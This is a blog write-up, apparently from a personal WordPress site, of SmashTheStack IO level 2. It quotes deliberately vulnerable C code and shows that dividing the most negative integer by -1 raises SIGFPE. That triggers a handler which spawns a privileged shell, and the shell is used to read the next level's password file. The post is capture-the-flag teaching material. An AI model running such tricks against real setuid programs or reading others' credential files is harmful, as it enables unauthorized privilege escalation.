Home > Bash, C, Linux, SmashTheStack.Org > [SmashTheStack – IO] Level 2

[SmashTheStack – IO] Level 2


So after done with level 1,  I start the game in next level, level 2.

Accessing the __/levels__, got the target, including both binary and source code (level02 + level02.c)

View source code:

//a little fun brought to you by bla

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <setjmp.h>

void catcher(int a)
{
        setresuid(geteuid(),geteuid(),geteuid());
        printf("WIN!\n");
        system("/bin/sh");
        exit(0);
}

int main(int argc, char **argv)
{
        puts("source code is available in level02.c\n");

        if (argc != 3 || !atoi(argv[2]))
                return 1;
        signal(SIGFPE, catcher);
        return abs(atoi(argv[1])) / atoi(argv[2]);
}

Things can be seen easily, the target is to trigger the signal __SIGFPE__ in order to call __catcher()__ to access shell of next level.
There is a check on argument passing, three arguments and the third one must be FALSE on __atoi()__ call.
Now, check about __SIGFPE__, what is it?
Following these links:
http://en.wikipedia.org/wiki/SIGFPE#SIGFPE
http://www.kernel.org/doc/man-pages/online/pages/man2/signal.2.html
http://www.gnu.org/software/libc/manual/html_node/Program-Error-Signals.html

Found out, it’s an exception raised when dividing to a zero. But it will not happen in our case because there is an argument check for the 2nd argument.
However, look up the “Notes” on the paper of kernel.org, it is said, “(Also dividing the most negative integer by -1 may generate SIGFPE.)

So try it by taking the most negative integer with -1.

level2@io:/levels$ ./level02 -2147483648 -1
source code is available in level02.c

WIN!
sh-4.1$ cat /home/level3/.pass
G2K2EP1luDpd**

Reach to next level!

Cheers,
Pete Houston

Advertisements
Categories: Bash, C, Linux, SmashTheStack.Org Tags: , ,
  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: